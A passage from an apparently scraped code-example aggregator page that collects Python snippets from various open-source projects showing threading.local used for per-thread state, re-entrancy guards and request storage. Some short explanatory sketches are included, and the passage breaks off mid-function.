    BUG_FIXING_COMMITS_DB,
    BUG_INTRODUCING_COMMITS_DB,
    TOKENIZED_BUG_INTRODUCING_COMMITS_DB,
)
from bugbug.utils import (
    ThreadPoolExecutorResult,
    download_and_load_model,
    zstd_compress,
)

basicConfig(level=INFO)
logger = getLogger(__name__)

thread_local = threading.local()

MAX_MODIFICATION_NUMBER = 50
RELATIVE_START_DATE = relativedelta(years=2, months=6)
# Only needed because mercurial<->git mapping could be behind.
RELATIVE_END_DATE = relativedelta(days=7)

IGNORED_COMMITS_DB = "data/ignored_commits.json"
db.register(
    IGNORED_COMMITS_DB,
    "https://s3-us-west-2.amazonaws.com/communitytc-bugbug/data/ignored_commits.json.zst",
    1,
)


class RegressorFinder(object):
Example #46
# Like ThreadLocal in Java: threading.local() stores a value per thread, and a value set in one thread is visible only in that thread
import threading

local_school = threading.local()


def process_student():
    print('Hello, %s (in %s)' % (local_school.student,
                                 threading.current_thread().name))


def process_thread(name):
    # bind a student name to the thread-local for this thread
    local_school.student = name
    process_student()


t1 = threading.Thread(target=process_thread, args=('Alice', ), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob', ), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()

# You can think of a ThreadLocal object as a dict keyed by thread: thread B can never read the value that thread A stored.
Example #47
"""Local storage of variables using weak references"""

import threading
import weakref


class WeakLocal(threading.local):
    def __getattribute__(self, attr):
        rval = super(WeakLocal, self).__getattribute__(attr)
        if rval:  # pragma: no cover
            # NOTE(mikal): this bit is confusing. What is stored is a weak
            # reference, not the value itself. We therefore need to lookup
            # the weak reference and return the inner value here.
            rval = rval()
        return rval

    def __setattr__(self, attr, value):
        value = weakref.ref(value)
        return super(WeakLocal, self).__setattr__(attr, value)


# NOTE(mikal): the name "store" should be deprecated in the future
store = WeakLocal()

# A "weak" store uses weak references and allows an object to fall out of scope
# when it falls out of scope in the code that uses the thread local storage. A
# "strong" store will hold a reference to the object so that it never falls out
# of scope.
weak_store = WeakLocal()
strong_store = threading.local()
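A short sketch of the difference described above; it relies on CPython's reference counting collecting the object as soon as its last strong reference disappears.

class Value(object):
    pass

v = Value()
weak_store.attr = v     # stored internally as weakref.ref(v)
print(weak_store.attr)  # the Value instance, while v is alive
del v
print(weak_store.attr)  # None: the weak reference is now dead

strong_store.attr = Value()
print(strong_store.attr)  # still alive: strong_store holds a real reference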
Example #48
# This paramstyle uses '%s' parameters.
paramstyle = 'format'

# --- private global constants

# Seconds have 3 decimal places in Salesforce, but they are rounded to
# whole seconds for most fields.
SALESFORCE_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f+0000'

# ---

request_count = 0  # global counter

connect_lock = threading.Lock()
thread_connections = threading.local()


class RawConnection(object):
    """
    parameters:
        settings_dict:  like settings.DATABASES['salesforce'] in Django
        alias:          important if the authentication should be shared across threads
        errorhandler: function with following signature
            ``errorhandler(connection, cursor, errorclass, errorvalue)``
        use_introspection: bool
    """
    # pylint:disable=too-many-instance-attributes

    Error = Error
    InterfaceError = InterfaceError
Example #49
import os
import threading
from textwrap import wrap
from typing import Any, Iterator, Optional, TextIO, Union

import rich
import rich.box
import rich.console
import rich.rule
import rich.segment
import rich.table
import rich.text

from flexget.options import ArgumentParser

local_context = threading.local()


class _Console(rich.console.Console):
    def __init__(self, *args, **kwargs):
        if "PYCHARM_HOSTED" in os.environ:
            kwargs.setdefault('color_system', 'truecolor')
        super().__init__(*args, **kwargs)

    def __call__(self, text: Any, *args, **kwargs) -> None:
        """
        Print to console safely. Output is able to be captured by different streams in different contexts.

        Any plugin wishing to output to the user's console should use this function instead of print so that
        output can be redirected when FlexGet is invoked from another process.
Example #50
def _setup_stdlib_logging(config: "HomeServerConfig",
                          log_config_path: Optional[str],
                          logBeginner: LogBeginner) -> None:
    """
    Set up Python standard library logging.
    """
    if log_config_path is None:
        log_format = (
            "%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s"
            " - %(message)s")

        logger = logging.getLogger("")
        logger.setLevel(logging.INFO)
        logging.getLogger("synapse.storage.SQL").setLevel(logging.INFO)

        formatter = logging.Formatter(log_format)

        handler = logging.StreamHandler()
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    else:
        # Load the logging configuration.
        _load_logging_config(log_config_path)

    # We add a log record factory that runs all messages through the
    # LoggingContextFilter so that we get the context *at the time we log*
    # rather than when we write to a handler. This can be done in config using
    # filter options, but care must be taken when using e.g. MemoryHandler to
    # buffer writes.

    log_context_filter = LoggingContextFilter()
    log_metadata_filter = MetadataFilter(
        {"server_name": config.server.server_name})
    old_factory = logging.getLogRecordFactory()

    def factory(*args: Any, **kwargs: Any) -> logging.LogRecord:
        record = old_factory(*args, **kwargs)
        log_context_filter.filter(record)
        log_metadata_filter.filter(record)
        return record

    logging.setLogRecordFactory(factory)

    # Route Twisted's native logging through to the standard library logging
    # system.
    observer = STDLibLogObserver()

    threadlocal = threading.local()

    @implementer(ILogObserver)
    def _log(event: dict) -> None:
        if "log_text" in event:
            if event["log_text"].startswith(
                    "DNSDatagramProtocol starting on "):
                return

            if event["log_text"].startswith("(UDP Port "):
                return

            if event["log_text"].startswith("Timing out client"):
                return

        # this is a workaround to make sure we don't get stack overflows when the
        # logging system raises an error which is written to stderr which is redirected
        # to the logging system, etc.
        if getattr(threadlocal, "active", False):
            # write the text of the event, if any, to the *real* stderr (which may
            # be redirected to /dev/null, but there's not much we can do)
            try:
                event_text = eventAsText(event)
                print("logging during logging: %s" % event_text,
                      file=sys.__stderr__)
            except Exception:
                # gah.
                pass
            return

        try:
            threadlocal.active = True
            return observer(event)
        finally:
            threadlocal.active = False

    logBeginner.beginLoggingTo([_log], redirectStandardIO=False)
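The threadlocal.active flag above is a per-thread re-entrancy guard. The same pattern reduced to a generic sketch, with illustrative names:

import threading

_guard = threading.local()

def guarded(handler, event):
    # Drop events generated while the handler itself is running on this
    # thread, preventing unbounded recursion.
    if getattr(_guard, "active", False):
        return
    try:
        _guard.active = True
        return handler(event)
    finally:
        _guard.active = False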
Example #51
import threading
import traceback

from .signal import Signal

local_tasks = threading.local()


class TaskFailure(Exception):
    def __init__(self, message):
        Exception.__init__(self, message)
        self.message = message


class TaskStopped(Exception):
    def __init__(self):
        Exception.__init__(self)


class Task(object):
    Failure = TaskFailure
    Stopped = TaskStopped

    def __init__(self, name: str) -> None:
        self.__name = name
        self.stop_flag = False
        self.started = Signal()
        self.succeeded = Signal()
        self.progressed = Signal()
        self.failed = Signal()
        self.stopped = Signal()
Example #52
class PredictionDoFn(beam.DoFn):
  """A DoFn class loading the model to create session and performing prediction.

  The input PCollection consists of a list of strings from the input files.

  The DoFn first loads the model from a given path where meta graph data and
  checkpoint data are exported to. Then if there is only one string input
  tensor or the model needs to preprocess the input, it directly passes the
  data to prediction. Otherwise, it tries to load the data into JSON.

  Then it batches the inputs of each instance into one feed_dict. After that, it
  runs session and predicts the interesting values for all the instances.
  Finally it emits the prediction result for each individual instance.
  """

  class _ModelState(object):
    """Atomic representation of the in-memory state of the model."""

    def __init__(self, model_dir, skip_preprocessing):
      self.model_dir = model_dir

      session, signature = mlprediction.load_model(model_dir)
      client = mlprediction.SessionClient(session, signature)
      self.model = mlprediction.DefaultModel.from_client(
          client, model_dir, skip_preprocessing=skip_preprocessing)

  # TODO(b/33746781): Get rid of this and instead use self._model_state for
  # all initialization detection.
  _thread_local = threading.local()

  def __init__(self, aggregator_dict=None, cloud_logger=None,
               skip_preprocessing=False,
               target="", config=None):
    """Constructor of Prediction beam.DoFn class.

    Args:
      aggregator_dict: A dict of aggregators containing maps from counter name
                       to the aggregator.
      cloud_logger: The cloud logging client to send logs to.
      skip_preprocessing: bool whether to skip preprocessing even when
                          the metadata.yaml/metadata.json file exists.
      target: The execution engine to connect to. See target in tf.Session(). In
              most cases, users should not set the target.
      config: A ConfigProto proto with configuration options. See config in
              tf.Session()

    Side Inputs:
      model_dir: The directory containing the model to load and the
                 checkpoint files to restore the session.
    """
    self._target = target
    self._skip_preprocessing = skip_preprocessing
    self._config = config
    self._aggregator_dict = aggregator_dict
    self._cloud_logger = cloud_logger
    self._model_state = None

    # Metrics.
    self._model_load_seconds_distribution = beam.metrics.Metrics.distribution(
        self.__class__, "model_load_seconds")

  def _create_snippet(self, input_data):
    """Truncate the input data to create a snippet."""
    try:
      input_snippet = "\n".join(str(x) for x in input_data)
      return unicode(input_snippet[:LOG_SIZE_LIMIT], errors="replace")
    except Exception:  # pylint: disable=broad-except
      logging.warning("Failed to create snippet from input: [%s].",
                      traceback.format_exc())
      return "Input snippet is unavailable."

  # TODO(user): Remove the try catch after sdk update
  def process(self, element, model_dir):
    try:
      element = element.element
    except AttributeError:
      pass

    try:
      if self._model_state is None:
        if (getattr(self._thread_local, "model_state", None) is None or
            self._thread_local.model_state.model_dir != model_dir):
          start = datetime.datetime.now()
          self._thread_local.model_state = self._ModelState(
              model_dir, self._skip_preprocessing)
          self._model_load_seconds_distribution.update(
              int((datetime.datetime.now() - start).total_seconds()))
        self._model_state = self._thread_local.model_state
      else:
        assert self._model_state.model_dir == model_dir

      # Try to load it.
      if (self._model_state.model.is_single_string_input() or
          self._model_state.model.need_preprocess()):
        loaded_data = element
      else:
        loaded_data = [json.loads(d) for d in element]
      instances = mlprediction.decode_base64(loaded_data)
      inputs, predictions = self._model_state.model.predict(instances)
      predictions = list(predictions)
      predictions = mlprediction.encode_base64(
          predictions,
          self._model_state.model.outputs_type_map())

      if self._aggregator_dict:
        aggr = self._aggregator_dict.get(
            aggregators.AggregatorName.ML_PREDICTIONS, None)
        if aggr:
          aggr.inc(len(predictions))

      for i, p in zip(inputs, predictions):
        yield i, p

    except mlprediction.PredictionError as e:
      logging.error("Got a known exception: [%s]\n%s", e.error_message,
                    traceback.format_exc())
      if self._cloud_logger:
        # TODO(user): consider to write a sink to buffer the logging events. It
        # also eliminates the restarting/duplicated running issue.
        self._cloud_logger.write_error_message(
            e.error_message, self._create_snippet(element))
      # reraise failure to load model as permanent exception to end dataflow job
      if e.error_code == mlprediction.PredictionError.FAILED_TO_LOAD_MODEL:
        raise beam.utils.retry.PermanentException(e.error_message)
      yield beam.pvalue.SideOutputValue("errors",
                                        (e.error_message, element))

    except Exception as e:  # pylint: disable=broad-except
      logging.error("Got an unknown exception: [%s].", traceback.format_exc())
      if self._cloud_logger:
        self._cloud_logger.write_error_message(
            str(e), self._create_snippet(element))
      yield beam.pvalue.SideOutputValue("errors", (str(e), element))
Example #53
class ProxyListenerDynamoDB(ProxyListener):
    thread_local = threading.local()

    def __init__(self):
        self._table_ttl_map = {}

    def forward_request(self, method, path, data, headers):
        if path.startswith('/shell'):
            return True
        data = json.loads(to_str(data))
        ddb_client = aws_stack.connect_to_service('dynamodb')

        if random.random() < config.DYNAMODB_ERROR_PROBABILITY:
            return error_response_throughput()

        action = headers.get('X-Amz-Target')
        if action == '%s.CreateTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) in table_names:
                return 200
        elif action in ('%s.PutItem' % ACTION_PREFIX,
                        '%s.UpdateItem' % ACTION_PREFIX,
                        '%s.DeleteItem' % ACTION_PREFIX):
            # find an existing item and store it in a thread-local, so we can access it in return_response,
            # in order to determine whether an item already existed (MODIFY) or not (INSERT)
            ProxyListenerDynamoDB.thread_local.existing_item = find_existing_item(
                data)
        elif action == '%s.DescribeTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) not in table_names:
                response = error_response(
                    message='Cannot do operations on a non-existent table',
                    error_type='ResourceNotFoundException')
                fix_headers_for_updated_response(response)
                return response
        elif action == '%s.DeleteTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) not in table_names:
                response = error_response(
                    message='Cannot do operations on a non-existent table',
                    error_type='ResourceNotFoundException')
                fix_headers_for_updated_response(response)
                return response
        elif action == '%s.BatchWriteItem' % ACTION_PREFIX:
            existing_items = []
            for table_name in sorted(data['RequestItems'].keys()):
                for request in data['RequestItems'][table_name]:
                    for key in ['PutRequest', 'DeleteRequest']:
                        inner_request = request.get(key)
                        if inner_request:
                            existing_items.append(
                                find_existing_item(inner_request, table_name))
            ProxyListenerDynamoDB.thread_local.existing_items = existing_items
        elif action == '%s.TransactWriteItems' % ACTION_PREFIX:
            existing_items = []
            for item in data['TransactItems']:
                for key in ['Put', 'Update', 'Delete']:
                    inner_item = item.get(key)
                    if inner_item:
                        existing_items.append(find_existing_item(inner_item))
            ProxyListenerDynamoDB.thread_local.existing_items = existing_items
        elif action == '%s.UpdateTimeToLive' % ACTION_PREFIX:
            # TODO: TTL status is maintained/mocked but no real expiry is happening for items
            response = Response()
            response.status_code = 200
            self._table_ttl_map[data['TableName']] = {
                'AttributeName':
                data['TimeToLiveSpecification']['AttributeName'],
                'Status': data['TimeToLiveSpecification']['Enabled']
            }
            response._content = json.dumps(
                {'TimeToLiveSpecification': data['TimeToLiveSpecification']})
            fix_headers_for_updated_response(response)
            return response
        elif action == '%s.DescribeTimeToLive' % ACTION_PREFIX:
            response = Response()
            response.status_code = 200
            if data['TableName'] in self._table_ttl_map:
                if self._table_ttl_map[data['TableName']]['Status']:
                    ttl_status = 'ENABLED'
                else:
                    ttl_status = 'DISABLED'
                response._content = json.dumps({
                    'TimeToLiveDescription': {
                        'AttributeName':
                        self._table_ttl_map[data['TableName']]
                        ['AttributeName'],
                        'TimeToLiveStatus':
                        ttl_status
                    }
                })
            else:  # TTL for dynamodb table not set
                response._content = json.dumps({
                    'TimeToLiveDescription': {
                        'TimeToLiveStatus': 'DISABLED'
                    }
                })
            fix_headers_for_updated_response(response)
            return response
        elif action in ('%s.TagResource' % ACTION_PREFIX,
                        '%s.UntagResource' % ACTION_PREFIX):
            response = Response()
            response.status_code = 200
            response._content = ''  # returns an empty body on success.
            fix_headers_for_updated_response(response)
            return response
        elif action == '%s.ListTagsOfResource' % ACTION_PREFIX:
            response = Response()
            response.status_code = 200
            response._content = json.dumps({
                'Tags': []
            })  # TODO: mocked and returns an empty list of tags for now.
            fix_headers_for_updated_response(response)
            return response

        return True

    def return_response(self, method, path, data, headers, response):
        if path.startswith('/shell'):
            return
        data = json.loads(to_str(data))

        # update table definitions
        if data and 'TableName' in data and 'KeySchema' in data:
            TABLE_DEFINITIONS[data['TableName']] = data

        if response._content:
            # fix the table and latest stream ARNs (DynamoDBLocal hardcodes "ddblocal" as the region)
            content_replaced = re.sub(
                r'("TableArn"|"LatestStreamArn"|"StreamArn")\s*:\s*"arn:aws:dynamodb:'
                + 'ddblocal:([^"]+)"',
                r'\1: "arn:aws:dynamodb:%s:\2"' % aws_stack.get_local_region(),
                to_str(response._content))
            if content_replaced != response._content:
                response._content = content_replaced
                fix_headers_for_updated_response(response)

        action = headers.get('X-Amz-Target')
        if not action:
            return

        record = {
            'eventID': '1',
            'eventVersion': '1.0',
            'dynamodb': {
                'StreamViewType': 'NEW_AND_OLD_IMAGES',
                'SizeBytes': -1
            },
            'awsRegion': config.DEFAULT_REGION,
            'eventSource': 'aws:dynamodb'
        }
        records = [record]

        if action == '%s.UpdateItem' % ACTION_PREFIX:
            if response.status_code == 200:
                updated_item = find_existing_item(data)
                if not updated_item:
                    return
                record['eventName'] = 'MODIFY'
                record['dynamodb']['Keys'] = data['Key']
                record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_item')
                record['dynamodb']['NewImage'] = updated_item
                record['dynamodb']['SizeBytes'] = len(json.dumps(updated_item))
        elif action == '%s.BatchWriteItem' % ACTION_PREFIX:
            records = self.prepare_batch_write_item_records(record, data)
        elif action == '%s.TransactWriteItems' % ACTION_PREFIX:
            records = self.prepare_transact_write_item_records(record, data)
        elif action == '%s.PutItem' % ACTION_PREFIX:
            if response.status_code == 200:
                existing_item = self._thread_local('existing_item')
                record['eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                keys = dynamodb_extract_keys(item=data['Item'],
                                             table_name=data['TableName'])
                if isinstance(keys, Response):
                    return keys
                record['dynamodb']['Keys'] = keys
                record['dynamodb']['NewImage'] = data['Item']
                record['dynamodb']['SizeBytes'] = len(json.dumps(data['Item']))
                if existing_item:
                    record['dynamodb']['OldImage'] = existing_item
        elif action == '%s.GetItem' % ACTION_PREFIX:
            if response.status_code == 200:
                content = json.loads(to_str(response.content))
                # make sure we append 'ConsumedCapacity', which is properly
                # returned by dynalite, but not by AWS's DynamoDBLocal
                if 'ConsumedCapacity' not in content and data.get(
                        'ReturnConsumedCapacity') in ('TOTAL', 'INDEXES'):
                    content['ConsumedCapacity'] = {
                        'CapacityUnits': 0.5,  # TODO hardcoded
                        'TableName': data['TableName']
                    }
                    response._content = json.dumps(content)
                    fix_headers_for_updated_response(response)
        elif action == '%s.DeleteItem' % ACTION_PREFIX:
            if response.status_code == 200:
                old_item = self._thread_local('existing_item')
                record['eventName'] = 'REMOVE'
                record['dynamodb']['Keys'] = data['Key']
                record['dynamodb']['OldImage'] = old_item
        elif action == '%s.CreateTable' % ACTION_PREFIX:
            if 'StreamSpecification' in data:
                create_dynamodb_stream(data)
            event_publisher.fire_event(
                event_publisher.EVENT_DYNAMODB_CREATE_TABLE,
                payload={'n': event_publisher.get_hash(data['TableName'])})
            return
        elif action == '%s.DeleteTable' % ACTION_PREFIX:
            event_publisher.fire_event(
                event_publisher.EVENT_DYNAMODB_DELETE_TABLE,
                payload={'n': event_publisher.get_hash(data['TableName'])})
            return
        elif action == '%s.UpdateTable' % ACTION_PREFIX:
            if 'StreamSpecification' in data:
                create_dynamodb_stream(data)
            return
        else:
            # nothing to do
            return

        if len(records) > 0 and 'eventName' in records[0]:
            if 'TableName' in data:
                records[0]['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    data['TableName'])
            forward_to_lambda(records)
            forward_to_ddb_stream(records)

    def prepare_batch_write_item_records(self, record, data):
        records = []
        i = 0
        for table_name in sorted(data['RequestItems'].keys()):
            for request in data['RequestItems'][table_name]:
                put_request = request.get('PutRequest')
                if put_request:
                    existing_item = self._thread_local('existing_items')[i]
                    keys = dynamodb_extract_keys(item=put_request['Item'],
                                                 table_name=table_name)
                    if isinstance(keys, Response):
                        return keys
                    new_record = clone(record)
                    new_record['eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                    new_record['dynamodb']['Keys'] = keys
                    new_record['dynamodb']['NewImage'] = put_request['Item']
                    if existing_item:
                        new_record['dynamodb']['OldImage'] = existing_item
                    new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                        table_name)
                    records.append(new_record)
                delete_request = request.get('DeleteRequest')
                if delete_request:
                    keys = delete_request['Key']
                    if isinstance(keys, Response):
                        return keys
                    new_record = clone(record)
                    new_record['eventName'] = 'REMOVE'
                    new_record['dynamodb']['Keys'] = keys
                    new_record['dynamodb']['OldImage'] = self._thread_local(
                        'existing_items')[i]
                    new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                        table_name)
                    records.append(new_record)
                i += 1
        return records

    def prepare_transact_write_item_records(self, record, data):
        records = []
        for i, request in enumerate(data['TransactItems']):
            put_request = request.get('Put')
            if put_request:
                existing_item = self._thread_local('existing_items')[i]
                table_name = put_request['TableName']
                keys = dynamodb_extract_keys(item=put_request['Item'],
                                             table_name=table_name)
                if isinstance(keys, Response):
                    return keys
                new_record = clone(record)
                new_record['eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['NewImage'] = put_request['Item']
                if existing_item:
                    new_record['dynamodb']['OldImage'] = existing_item
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
            update_request = request.get('Update')
            if update_request:
                table_name = update_request['TableName']
                keys = update_request['Key']
                if isinstance(keys, Response):
                    return keys
                updated_item = find_existing_item(update_request, table_name)
                if not updated_item:
                    return
                new_record = clone(record)
                new_record['eventName'] = 'MODIFY'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_items')[i]
                new_record['dynamodb']['NewImage'] = updated_item
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
            delete_request = request.get('Delete')
            if delete_request:
                table_name = delete_request['TableName']
                keys = delete_request['Key']
                if isinstance(keys, Response):
                    return keys
                new_record = clone(record)
                new_record['eventName'] = 'REMOVE'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_items')[i]
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
        return records

    def _thread_local(self, name, default=None):
        try:
            return getattr(ProxyListenerDynamoDB.thread_local, name)
        except AttributeError:
            return default
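
The pattern above — stashing pre-request state on a class-level threading.local in forward_request and reading it back in return_response — generalizes to any proxy that must correlate the two phases on the same worker thread. A minimal sketch of the idea (the Proxy class and its method names are illustrative, not part of LocalStack):

import threading

class Proxy:
    # One local() instance shared by the class; each thread sees its own attributes.
    thread_local = threading.local()

    def forward_request(self, old_item):
        # Remember the pre-write state for this thread's in-flight request.
        Proxy.thread_local.existing_item = old_item

    def return_response(self):
        # getattr() with a default mirrors the _thread_local() helper above.
        old = getattr(Proxy.thread_local, 'existing_item', None)
        return 'MODIFY' if old is not None else 'INSERT'

Note the handoff only works because the request and its response are processed on the same thread; a pooled or async dispatcher would need request-scoped storage instead.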
Example #54
0
import threading
from typing import TYPE_CHECKING

from apache_beam.runners import common
from apache_beam.utils.counters import Counter
from apache_beam.utils.counters import CounterFactory
from apache_beam.utils.counters import CounterName

try:
    from apache_beam.runners.worker import statesampler_fast as statesampler_impl  # type: ignore
    FAST_SAMPLER = True
except ImportError:
    from apache_beam.runners.worker import statesampler_slow as statesampler_impl
    FAST_SAMPLER = False

if TYPE_CHECKING:
    from apache_beam.metrics.execution import MetricsContainer

_STATE_SAMPLERS = threading.local()


def set_current_tracker(tracker):
    _STATE_SAMPLERS.tracker = tracker


def get_current_tracker():
    try:
        return _STATE_SAMPLERS.tracker
    except AttributeError:
        return None


_INSTRUCTION_IDS = threading.local()
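
A quick demonstration of why the tracker lives in a threading.local: each thread gets its own slot, so setting a tracker in one thread is invisible to every other. A self-contained sketch, independent of Beam:

import threading

_STATE = threading.local()

def set_tracker(t):
    _STATE.tracker = t

def get_tracker():
    # A missing attribute means this thread never called set_tracker.
    return getattr(_STATE, 'tracker', None)

def worker():
    assert get_tracker() is None  # not inherited from the main thread
    set_tracker('worker-tracker')

set_tracker('main-tracker')
t = threading.Thread(target=worker)
t.start()
t.join()
assert get_tracker() == 'main-tracker'  # untouched by the worker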
Example #55
0
    def __init__(self, *args):
        self._thread_local = threading.local()
        super(MockOsEnv, self).__init__(*args)
Example #56
0
# BruteBuster by Cyber Security Consulting (www.csc.bg)
"""
Brutebuster needs access to the REMOTE_IP of the incoming request. We're doing
this by adding the request object to the thread_local space
"""

try:
    from threading import local
except ImportError:
    from django.utils.threading_local import local

_thread_locals = local()


def get_request():
    return getattr(_thread_locals, 'request', None)


class RequestMiddleware(object):
    """Provides access to the request object via thread locals"""
    def __init__(self, get_response):
        self.get_response = get_response
        # One-time configuration and initialization.

    def __call__(self, request):
        _thread_locals.request = request
        # Code to be executed for each request before
        # the view (and later middleware) are called.

        response = self.get_response(request)
        # Code to be executed for each request/response after
        # the view is called.
        return response
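
With the middleware installed, any code running on the same thread can recover the current request without it being passed down the call stack. A hypothetical consumer building on the snippet above (client_ip is illustrative, not part of BruteBuster):

def client_ip():
    # Works anywhere below the middleware on this thread's call stack.
    request = get_request()
    if request is None:
        return None  # e.g. a management command or test without the middleware
    return request.META.get('REMOTE_ADDR')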
Example #57
0
class Registry(object):
    """Holds all registered properties and their various overrides."""
    registered = {}
    test_overrides = {}
    db_items = {}
    db_overrides = {}
    names_with_draft = {}
    last_update_time = 0
    update_index = 0
    threadlocal = threading.local()
    REENTRY_ATTR_NAME = 'busy'

    @classmethod
    def get_overrides(cls, force_update=False):
        """Returns current property overrides, maybe cached."""

        now = long(time.time())
        age = now - cls.last_update_time
        max_age = UPDATE_INTERVAL_SEC.get_value(db_overrides=cls.db_overrides)

        # do not update if call is reentrant or outer db transaction exists
        busy = hasattr(cls.threadlocal,
                       cls.REENTRY_ATTR_NAME) or (db.is_in_transaction())

        if (not busy) and (force_update or age < 0 or age >= max_age):
            # Value of '0' disables all datastore overrides.
            if UPDATE_INTERVAL_SEC.get_value() == 0:
                cls.db_overrides = {}
                return cls.db_overrides

            # Load overrides from a datastore.
            setattr(cls.threadlocal, cls.REENTRY_ATTR_NAME, True)
            try:
                old_namespace = namespace_manager.get_namespace()
                try:
                    namespace_manager.set_namespace(
                        appengine_config.DEFAULT_NAMESPACE_NAME)
                    cls._load_from_db()
                finally:
                    namespace_manager.set_namespace(old_namespace)
            except Exception as e:  # pylint: disable=broad-except
                logging.error('Failed to load properties from a database: %s.',
                              str(e))
            finally:
                delattr(cls.threadlocal, cls.REENTRY_ATTR_NAME)

                # Avoid overload and update timestamp even if we failed.
                cls.last_update_time = now
                cls.update_index += 1

        return cls.db_overrides

    @classmethod
    def _load_from_db(cls):
        """Loads dynamic properties from db."""
        items = {}
        overrides = {}
        drafts = set()
        for item in ConfigPropertyEntity.all().fetch(1000):
            items[item.key().name()] = item
            cls._set_value(item, overrides, drafts)
        cls.db_items = items
        cls.db_overrides = overrides
        cls.names_with_draft = drafts

    @classmethod
    def _config_property_entity_changed(cls, item):
        cls._set_value(item, cls.db_overrides, cls.names_with_draft)

    @classmethod
    def _set_value(cls, item, overrides, drafts):
        name = item.key().name()
        target = cls.registered.get(name, None)
        if not target:
            logging.warning('Property is not registered (skipped): %s', name)
            return

        if item.is_draft:
            if name in overrides:
                del overrides[name]
            drafts.add(name)
        else:
            if name in drafts:
                drafts.remove(name)

            # Enforce value type.
            try:
                value = transforms.string_to_value(item.value,
                                                   target.value_type)
            except Exception:  # pylint: disable=broad-except
                logging.error(
                    'Property %s failed to cast to a type %s; removing.',
                    target.name, target.value_type)
                return

            # Enforce value validator.
            if target.validator:
                errors = []
                try:
                    target.validator(value, errors)
                except Exception as e:  # pylint: disable=broad-except
                    errors.append('Error validating property %s.\n%s' %
                                  (target.name, e))
                if errors:
                    logging.error('Property %s has invalid value:\n%s',
                                  target.name, '\n'.join(errors))
                    return

            overrides[name] = value
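
The REENTRY_ATTR_NAME dance above is a thread-local reentry guard: a flag set on cls.threadlocal keeps a nested call (e.g. a get_value() that consults the overrides while they are being loaded) from recursing back into the datastore. A minimal standalone sketch of the same idea:

import threading

_guard = threading.local()

def refresh(load):
    # Reentrant call on the same thread: bail out, the outer call is already loading.
    if getattr(_guard, 'busy', False):
        return None
    _guard.busy = True
    try:
        return load()  # load() may itself end up calling refresh()
    finally:
        del _guard.busy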
Example #58
0
import threading

from ._parallel_backends import (MultiprocessingBackend, ThreadingBackend,
                                 SequentialBackend, LokyBackend)

BACKENDS = {
    'multiprocessing': MultiprocessingBackend,
    'threading': ThreadingBackend,
    'sequential': SequentialBackend,
    'loky': LokyBackend,
}

# name of the backend used by default by Parallel outside of any context
# managed by ``parallel_backend``.
DEFAULT_BACKEND = 'loky'
DEFAULT_N_JOBS = 1
DEFAULT_THREAD_BACKEND = 'threading'

# Thread local value that can be overridden by the ``parallel_backend`` context
# manager
_backend = threading.local()

VALID_BACKEND_HINTS = ('processes', 'threads', None)
VALID_BACKEND_CONSTRAINTS = ('sharedmem', None)


def get_active_backend(prefer=None, require=None, verbose=0):
    """Return the active default backend"""
    if prefer not in VALID_BACKEND_HINTS:
        raise ValueError("prefer=%r is not a valid backend hint, "
                         "expected one of %r" % (prefer, VALID_BACKEND_HINTS))
    if require not in VALID_BACKEND_CONSTRAINTS:
        raise ValueError("require=%r is not a valid backend constraint, "
                         "expected one of %r" %
                         (require, VALID_BACKEND_CONSTRAINTS))
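
The `_backend` local is what lets a parallel_backend-style context manager override the default per thread without affecting concurrent callers. A simplified sketch of that mechanism (not joblib's actual implementation):

import threading
from contextlib import contextmanager

_backend = threading.local()

def active_backend():
    return getattr(_backend, 'name', 'loky')  # fall back to the default

@contextmanager
def backend(name):
    previous = getattr(_backend, 'name', None)
    _backend.name = name
    try:
        yield
    finally:
        if previous is None:
            del _backend.name
        else:
            _backend.name = previous

with backend('threading'):
    assert active_backend() == 'threading'
assert active_backend() == 'loky'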
Example #59
0
import os
import torch
import traceback
import warnings
import threading
from torch._six import raise_from
from ._utils import _get_device_index
import torch._C

try:
    from torch._C import _cudart
except ImportError:
    _cudart = None

_initialized = False
_tls = threading.local()
_initialization_lock = threading.Lock()
_queued_calls = []  # don't invoke these until initialization occurs
_is_in_bad_fork = getattr(torch._C, "_cuda_isInBadFork", lambda: False)


def is_available():
    r"""Returns a bool indicating if CUDA is currently available."""
    if (not hasattr(torch._C, '_cuda_isDriverSufficient')
            or not torch._C._cuda_isDriverSufficient()):
        return False
    return torch._C._cuda_getDeviceCount() > 0


def _sleep(cycles):
    torch._C._cuda_sleep(cycles)
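
The module-level `_initialization_lock` and `_queued_calls` implement deferred initialization: calls made before CUDA is initialized are parked and replayed exactly once, under a lock, when initialization actually happens. A stripped-down sketch of that pattern (illustrative, not torch's code; torch additionally uses `_tls` to handle reentrancy on the initializing thread):

import threading

_initialized = False
_lock = threading.Lock()
_queued_calls = []  # (callable, args) pairs parked until init

def lazy_call(fn, *args):
    # Like torch's _lazy_call: run immediately if initialized, else queue.
    if _initialized:
        fn(*args)
    else:
        _queued_calls.append((fn, args))

def lazy_init(do_init):
    global _initialized
    with _lock:              # only one thread performs initialization
        if _initialized:
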